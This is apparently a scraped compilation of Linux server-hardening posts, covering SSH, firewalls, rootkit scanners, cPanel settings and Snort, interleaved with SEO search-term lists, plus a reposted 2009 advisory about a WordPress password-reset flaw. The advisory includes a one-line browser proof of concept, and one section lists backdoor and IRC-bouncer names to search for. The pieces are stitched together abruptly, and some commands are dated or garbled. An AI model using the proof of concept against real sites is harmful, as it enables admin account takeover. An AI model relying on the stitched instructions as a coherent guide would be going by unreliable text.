Edit the SSHD configuration and make the changes listed below:

    vi /etc/ssh/sshd_config

1) Set the default SSH port 22 to a higher value, by changing the ‘Port’ directive

    Port 2233

2) To make SSH work on a secure protocol, set the ‘Protocol’ directive as

    Protocol 2

3) Bind SSHD service to a specific IP of the server, which you can achieve by replacing ‘#ListenAddress’ directive to

    ListenAddress xx.xx.xx.xx

where, xx.xx.xx.xx is the additional IP of the server and the only one which will allow you to SSH into the server.

4) To disable root access, set ‘PermitRootLogin’ directive to ‘no’

    PermitRootLogin no

Make sure you add an alternate SSH user on the server who have privileges to gain root access before disabling this option.

5) To allow SSH access to specific users, add the “AllowUsers” directive at the end of the configuration

    AllowUsers user1 user2

This will allow SSH access to users user1 and user2. You need to allow SSH access to the user who is allowed to gain root access incase root access is disabled.

Save the file and restart the sshd service

    service sshd restart

6) Using the TCP wrappers i.e. hosts.allow and hosts.deny, you can restrict SSH access to specific IPs i.e. edit /etc/hosts.allow and add the following

sshd : yourlocalip: allow
sshd : all : deny

“yourlocalip” is the one assigned by your ISP. It will restrict SSH access to your local IP only.

Incoming search terms:

• /etc/hosts allow ssh only (1)

II. BACKGROUND

WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it.
III. DESCRIPTION

The way WordPress handle a password reset looks like this: You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

”
Someone has asked to reset the password for the following site and username. http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag ”

You click on the link, and then WordPress reset your admin password, and sends you over another email with your new credentials.

Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {

global $wpdb;

$key = preg_replace(’/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )

return new WP_Error(’invalid_key’, __(’Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(”SELECT * FROM $wpdb->users WHERE user_activation_key = %s”, $key));

if ( empty( $user ) )

return new WP_Error(’invalid_key’, __(’Invalid key’)); …[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’; $errors = new WP_Error();

if ( isset($_GET['key']) )

$action = ‘resetpass’;

// validate action so as to default to the login screen if ( !in_array($action, array(’logout’, ‘lostpassword’, ‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false === has_filter(’login_form_’ . $action) )

$action = ‘login’;
…[snip]….

line 370:

break;

case ‘resetpass’ :
case ‘rp’ :

$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect(’wp-login.php?checkemail=newpass’);
exit();

}

wp_redirect(’wp-login.php?action=lostpassword&error=invalidkey’); exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and then reset the admin password by submiting an array to the $key variable.

Source:

IV. PROOF OF CONCEPT

A web browser is sufficiant to reproduce this Proof of concept: http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]= The password will be reset without any confirmation.

V. BUSINESS IMPACT

An attacker could exploit this vulnerability to compromise the admin account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED

All

VII. SOLUTION

No patch aviable for the moment.

VIII. REFERENCES

http://seclists.org/fulldisclosure/2009/Aug/0113.html

Incoming search terms:

• tar -xzf csf tgz CPANEL (1)
• wp-login php?action=resetpass login=admin key= (1)
• wp_login action wordpress (1)

extract:
# tar zxf rkhunter-<version>.tar.gz

installation:
# cd rkhunter
# ./installer.sh

(Source: http://www.evolution-security.com/)
(Source: http://www.rootkit.nl/articles/rootkit_hunter_faq.html)

Incoming search terms:

• centos xen windows windows\system32\config\system (3)
• qmhandle centos install wget (2)
• rootkit hunter windows 2012 (1)
• rootkit hunter windows (1)
• plesk install rootkit (1)
• linux system files libz2 (1)
• install rootkit plesk (1)
• directadmin rootkit (1)
• directadmin rookit install (1)
• tarzxg (1)

# echo 1 > /proc/sys/net/ipv4/tcp_syncookies

2. Increase the backlog queue to 2048 by the command:

# sysctl -w net.ipv4.tcp_max_syn_backlog=”2048″

Incoming search terms:

• linux mail queue maildrop permission denied (1)

Listing total connections
netstat -nap | grep ESTABLISHED | wc -l
netstat -nap | grep SYN | wc -l
netstat -nap | grep TIME_WAIT | wc -l

Incoming search terms:

• adodb on directadmin (2)
• net bridge bridge-nf-call-arptables is an unknown key on oracle linux 6 (2)
• centOS directadmin ip block (1)
• iredmail block the dns port how to enable it (1)
• iptables windows 2011 (1)
• iptables howto centos cpanel (1)
• iptables directadmin (1)
• iptables centos directadmin (1)
• centos directadmin ftp unknown problem (1)
• how-to: list/ban ip thegioinguonmo (1)

A quick and usefull command for checking if a server is under ddos is:

netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n

That will list the IPs taking the most amount of connections to a server. It is important to remember that the ddos is becoming more sophistcated and they are using fewer connections with more attacking ips. If this is the case you will still get low number of connections even while you are under a DDOS.

Incoming search terms:

• centos ddos güvenlik (1)
• centos malicious script scan (1)
• print $telnet->cmd \ps -ef | grep -i with awk with windows (1)
• script ddos (1)

netstat -n --tcp --udp --numeric-hosts | \
grep -v 127.0.0.1 | \
awk '{if (/(tcp|udp)/) { print $5 }}' | \
sed 's/:.*//' | \
sort | \
uniq -c | \
sort -n | \
awk '{if ($1 > 25) {print "Count: "$1"\t"$2; }}'

and here is an example output:

Count: 26       92.80.103.61
Count: 27       77.246.104.149
Count: 35       88.232.169.103
Count: 44       88.226.7.150

If we want to list only the ip addresses, not the counter, change the last line as below:

awk '{if ($1 > 25) {print $2; }}'

Incoming search terms:

• networksolution ssl direct admin (1)

Incoming search terms:

• csf centos directadmin (1)
• lf_pop3d (1)
• linux csf block ip permanently (1)
• what is lf_pop3d in csf (1)

Below given are some of the steps that can be used to secure your server.

Disable identification output for Apache

To disable the version output for proftp, SSH into server and login as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type: /etc/rc.d/init.d/httpd restart

These are applications that will help to secure your server.

Install and run chkrootkit

To install chrootkit, SSH into server and login as root.

At command prompt type: cd /root/

At command prompt type: wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

At command prompt type: tar xvzf chkrootkit.tar.gz

At command prompt type: cd chkrootkit-0.44

At command prompt type: make sense

To run chkrootkit

At command prompt type: /root/chkrootkit-0.44/chkrootkit

Make sure you run it on a regular basis, perhaps including it in a cron job.

Install APF Firewall

To install APF, SSH into server and login as root.

At command prompt type: cd /root/

At command prompt type: wget http://www.rfxnetworks.com/downloads/apf-current.tar.gz

At command prompt type: tar -xvzf apf-current.tar.gz

At command prompt type: rm -f apf-current.tar.gz

At command prompt type: cd apf-0.9.4-6

At command prompt type: sh ./install.sh

After APF has been installed, you need to edit the configuration file.

At command prompt type: cd /etc/apf

At command prompt type: pico -w conf.apf

Scroll down and find

USE_DS=”0″

change it to

USE_DS=”1″

Now scroll down and configure the Ports. The following ports are required for CPanel:

Code:

Common ingress (inbound) TCP ports
IG_TCP_CPORTS=”21,22,25,53,80,110,143,465,953,993,995,2082,2083,2084,2086,2087,2095,2096,3306,6666,7786,3000_3500″

Note: If you changed the port for SSH, be sure to include that port and remove port 22.

—–
21 FTP (TCP)
22 SSH (TCP)
25 SMTP (TCP)
53 DNS – Domain Name Server (TCP)
80 HTTP (TCP)
110 POP3 (TCP)
143 IMAP (TCP)
443 HTTPS (TCP)
465 sSMTP (TCP)
953 ??BIND??
993 IMAP4 protocol over TLS/SSL (TCP)
995 POP3 protocol over TLS/SSL (was spop3) (TCP)
2082 CPANEL (http://sitename.com:2082) (TCP)
2083 CPANEL SSL (https://sitename.com:2083) (TCP)
2084 entropychat server (disable from CPANEL service manager if not used) (TCP)
2086 WHM (http://sitename.com:2086) (TCP)
2087 WHM SSL (https://sitename.com:2087) (TCP)
2095 WebMail (http://sitename.com:2095) (TCP)
2096 WebMail SSL (https://sitename.com:2096)
3306 mySQL remote access (TCP)
6666 Melange chat Server (disable from CPANEL service manager if not used) (TCP)
7786 Interchange (TCP)
3000_3500
—–
5100 for ASP,
8080 and 8443 for JSP if you use them.
—–

Code:

Common ingress (inbound) UDP ports
IG_UDP_CPORTS=”53,6277

—–
53 DNS – Domain Name Server
6277 SpamAssassin / DCC (email scanning)
—–

Code:

Common ICMP (inbound) types
IG_ICMP_TYPES=”3,5,11,0,30,8″

—–
0 Echo Reply
3 Destination Unreachable
5 Destination Unreachable
8 Echo
11 Time Exceeded
30 Traceroute
—–

Code:

Common egress (outbound) TCP ports
EG_TCP_CPORTS=”21,25,37,53,80,110,113,#123,443,43,873,953,2089,2703,3306″

—–
21 FTP
25 SMTP
37 Required for CPANEL Licensing
53 DNS – Domain Name Server
80 HTTP
110 POP3 (if you have scripts that need to retrieve email via POP, e.g. HelpDesk)
113 Authentication Protocol (AUTH)
123 NTP (Network Time)
443 HTTPS
43 WHOIS
873 rsync (CPanel updates)
953 BIND ??
2089 Required for CPANEL Licensing
2703 Razor (email scanning)
3306 mySQL remote access
—–

Code:

Common egress (outbound) UDP ports
EG_UDP_CPORTS=”20,21,53,873,953,6277″

—–
20 ftp-data
21 FTP
53 DNS – Domain Name Server
873 rsync
953 BIND ??
6277 SpamAssassin / DCC (email scanning)
—–

Code:

Common ICMP (outbound) types
EG_ICMP_TYPES=”all”

Save the changes then exit.

To start APF

At command prompt type: /usr/local/sbin/apf -s

APF commands are:

-s start
-r restart
-f flush – stop
-l list
-st status
-a HOST allow HOST
-d HOST deny HOST

Log out of SSH and then login again.

After you are sure everything is working fine, change the DEV option

At command prompt type: cd /etc/apf

At command prompt type: pico -w conf.apf

Scroll down and find

DEVM=”1″

change it to

DEVM=”0″

Save changes, exit and then restart firewall,

At command prompt type: /usr/local/sbin/apf -r

Install BFD (Brute Force Detection)

To install BFD, SSH into server and login as root.

At command prompt type: cd /root/

At command prompt type: wget http://www.rfxnetworks.com/downloads/bfd-current.tar.gz

At command prompt type: tar -xvzf bfd-current.tar.gz

At command prompt type: cd bfd-0.4

At command prompt type: ./install.sh

After BFD has been installed, you need to edit the configuration file.

At command prompt type: pico /usr/local/bfd/conf.bfd

Under Enable brute force hack attempt alerts:

Find

ALERT_USR=”0″

and change it to

ALERT_USR=”1″

Find

EMAIL_USR=”root”

and change it to

EMAIL_USR=”your@email.com”

Save the changes then exit.

To start BFD

At command prompt type: /usr/local/sbin/bfd -s

Modify LogWatch

Logwatch is a customizable log analysis system. It parses through your system’s logs for a given period of time and creates a report analyzing areas that you specify, in as much detail as you require. Logwatch is already installed on most CPanel servers.

To modify LogWatch, SSH into server and login as root.

At command prompt type: pico -w /etc/log.d/conf/logwatch.conf

Scroll down to

MailTo = root

and change to

Mailto = your@email.com

Note: Set the e-mail address to an offsite account incase you get hacked.

Now scroll down to

Detail = Low

Change that to Medium, or High…

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions.

Save and exit.
These are measures that can be taken to secure your server, with SSH access.

Udate OS, Apache and CPanel to the latest stable versions.

This can be done from WHM/CPanel.

Restrict SSH Access

To restrict and secure SSH access, bind sshd to a single IP that is different than the main IP to the server, and on a different port than port 22.

SSH into server and login as root.

Note: You can download Putty by Clicking Here. It’s a clean running application that will not require installation on Windows-boxes.

At command prompt type: pico /etc/ssh/sshd_config

Scroll down to the section of the file that looks like this:

Code:

#Port 22
#Protocol 2, 1
#ListenAddress 0.0.0.0
#ListenAddress ::

Uncomment and change

#Port 22

to look like

Port 5678 (choose your own 4 to 5 digit port number (49151 is the highest port number)

Uncomment and change

#Protocol 2, 1

to look like

Protocol 2

Uncomment and change

#ListenAddress 0.0.0.0

to look like

ListenAddress 123.123.123.15 (use one of your own IP Addresses that has been assigned to your server)

Note 1: If you would like to disable direct Root Login, scroll down until you find

#PermitRootLogin yes

and uncomment it and make it look like

PermitRootLogin no

Save by pressing Ctrl o on your keyboard, and then exit by pressing Ctrl x on your keyboard.

Note 2: You can also create a custome nameserver specifically for your new SSH IP address. Just create one called something like ssh.xyz.com or whatever. Be sure to add an A address to your zone file for the new nameserver.

Now restart SSH

At command prompt type: [b]/etc/rc.d/init.d/sshd restart[b]

Exit out of SSH, and then re-login to SSH using the new IP or nameserver, and the new port.

Note: If you should have any problems, just Telnet into your server, fix the problem, then SSH in again. Telnet is a very unsecure protocol, so change your root password after you use it.

Disable Telnet

To disable telnet, SSH into server and login as root.

At command prompt type: pico -w /etc/xinetd.d/telnet

change disable = no to disable = yes

Save and Exit

At command prompt type: /etc/init.d/xinetd restart

Server e-mail everytime someone logs in as root

To have the server e-mail you everytime someone logs in as root, SSH into server and login as root.

At command prompt type: pico .bash_profile

Scroll down to the end of the file and add the following line:

echo ‘ALERT – Root Shell Access on:’ `date` `who` | mail -s “Alert: Root Access from `who | awk ‘{print $6}’`” your@email.com

Save and exit.

Set an SSH Legal Message

To an SSH legal message, SSH into server and login as root.

At command prompt type: pico /etc/motd

Enter your message, save and exit.

Note: I use the following message…

Code:

ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.

This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.

Now everytime someone logs in as root, they will see this message… go ahead a try it.

Disable Shell Accounts

To disable any shell accounts hosted on your server SSH into server and login as root.

At command prompt type: locate shell.php

Also check for:

locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts

These are items inside of WHM/Cpanel that should be changed to secure your server.

Goto Server Setup =>> Tweak Settings

Check the following items…

Under Domains

Prevent users from parking/adding on common internet domains. (ie hotmail.com, aol.com)

Under Mail

Attempt to prevent pop3 connection floods
Default catch-all/default address behavior for new accounts – blackhole

Under System

Use jailshell as the default shell for all new accounts and modified accounts

Goto Server Setup =>> Tweak Security

Enable php open_basedir Protection

Enable mod_userdir Protection

Disabled Compilers for unprivileged users.

Goto Server Setup =>> Manage Wheel Group Users

Remove all users except for root and your main account from the wheel group.

Goto Server Setup =>> Shell Fork Bomb Protection

Enable Shell Fork Bomb/Memory Protection

When setting up Feature Limits for resellers in Resellers =>> Reseller Center, under Privileges always disable Allow Creation of Packages with Shell Access and enable Never allow creation of accounts with shell access; under Root Access disable All Features.

Goto Service Configuration =>> FTP Configuration

Disable Anonymous FTP

Goto Account Functions =>> Manage Shell Access

Disable Shell Access for all users (except yourself)

Goto Mysql =>> MySQL Root Password

Change root password for MySQL

Goto Security and run Quick Security Scan and Scan for Trojan Horses often. The following and similar items are not Trojans:

/sbin/depmod
/sbin/insmod
/sbin/insmod.static
/sbin/modinfo
/sbin/modprobe
/sbin/rmmod
Reply With Quote Multi-Quote This Message
000000000
View Public Profile
Send a private message to 000000000
Visit 000000000’s homepage!
Find all posts by 000000000
Add 000000000 to Your Buddy List
#2 Add to 000000000’s Reputation Report Post
Old 10-02-2004, 08:56 PM
000000000 000000000 is offline
Registered User

Note: There will be several listings that will be OS/CPanel related. Examples are

/home/cpapachebuild/buildapache/php-4.3.1/ext/ircg
/usr/local/cpanel/etc/sym/eggdrop.sym
/usr/local/cpanel/etc/sym/bnc.sym
/usr/local/cpanel/etc/sym/psyBNC.sym
/usr/local/cpanel/etc/sym/ptlink.sym
/usr/lib/libncurses.so
/usr/lib/libncurses.a
etc.

Incoming search terms:

• basic analysis and security engine performance (1)
• securing centos (1)
• plesk logwatch notifications email address change (1)
• plesk chkrootkit (1)
• how to install libpcap-0 9 4 in linux (1)
• how to disable ftp anonymouse root login directadmin (1)
• directadmin pecl (1)
• centos restrict ssh ip (1)
• centos flush dns directadmin (1)
• securing directadmin (1)

Open your favorite web browser and go to: http://www.example.com/base-1.2.5/setup
If all is setup okay you should see the BASE Setup Program page:

Click on Continue

step 1 of 5:
Enter the path to ADODB (/var/www/adodb):

click on Submit Query

step 2 of 5:
Enter the needed info on the next screen: (leave the Use Archive Database as is):

click on Submit Query

step 3 of 5:
If you want to Use Authentication for the Base page you can do so here:

click on Submit Query

step 4 of 5:
Click on Create BASE AG to create the database.

and after Create BASE AG

Once done, click on Now continue to step 5…

To make the Graph’s from BASE work you will also need to install Image_Color, Image_Canvas and Image_Graph.
To do this do:

pear install Image_Color
pear install Image_Canvas-alpha
pear install Image_Graph-alpha

That it for BASE!

If you want you can chmod the base-1.2.5 dir back to 775:

chmod 775 base-1.2.5

You can also delete the snorttemp directory, and all the files in it.

Starting Snort

To start SNORT and make BASE show you the Snort’s logged info, you will need to run:

/usr/local/bin/snort -c /etc/snort/snort.conf -i eth0 -g root -D

Now wait some time and see all the Snort alerts show up in BASE.

Links

• BASE: http://secureideas.sourceforge.net
• Snort: http://www.snort.org

Incoming search terms:

• plesk snort how to (1)
• setup snort and base (1)
• snort on plesk server (1)
• snort with plesk (1)